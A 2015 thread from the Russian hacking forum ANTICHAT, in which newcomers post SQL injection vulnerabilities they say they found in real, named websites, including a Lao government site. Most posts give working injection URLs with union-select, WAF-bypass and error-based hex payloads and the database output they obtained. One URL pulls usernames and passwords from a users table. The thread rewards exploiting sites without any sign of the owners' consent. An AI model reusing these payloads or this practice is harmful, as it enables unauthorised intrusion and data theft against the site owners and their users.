ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.05.2015, 10:12
|
|
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме: 20377164
Репутация:
0
|
|
Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
Google:
Код:
Code:
site:antichat.ru ваш_сайт_с_уязвимостью.ру
Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.
Сообщение от BigBear
BigBear said:
↑
Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.
|
|
|

10.05.2015, 11:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
|
|
|
|

10.05.2015, 11:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
|
|
|
|

10.05.2015, 12:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
bidderland.co.in/siteadmin
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
|
|
|
|

10.05.2015, 20:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
А что не раскрутил ?
Код:
Code:
http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
Версия: 5.5.43-37.2
User: c2deuts_ice@localhost
-----------------------------
Сообщение от None
Вторая XSS
Зачем делать несколько постов можно в одном все выложить
|
|
|
|

10.05.2015, 20:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от tiger_x
tiger_x said:
↑
Просто прямо сейчас ищу )) Как нахожу выкладываю!
Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
|
|
|

10.05.2015, 21:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 56887
Репутация:
28
|
|
Код HTML:
HTML:
http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
5.5.40-0ubuntu0.12.04.1 - вывод в заголовке
Код HTML:
HTML:
http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
5.6.23
Код HTML:
HTML:
http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
4.1.18-nt
|
|
|
|

10.05.2015, 23:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 56887
Репутация:
28
|
|
Код HTML:
HTML:
http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
idserver_damico@winwebs03.cpt.wa.co.za
idserver_damicodb
5.5.42-cll
|
|
|
|

11.05.2015, 00:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 35015
Репутация:
57
|
|
http://goo.gl/imjzsb
http://goo.gl/8IKVeV
http://goo.gl/wYRBLz
http://emofans.ru/gallery/emowallp/
POST_DATA:
foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- -
https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x)
|
|
|
|

11.05.2015, 00:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 35015
Репутация:
57
|
|
Демонстрация SQLi от меня
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|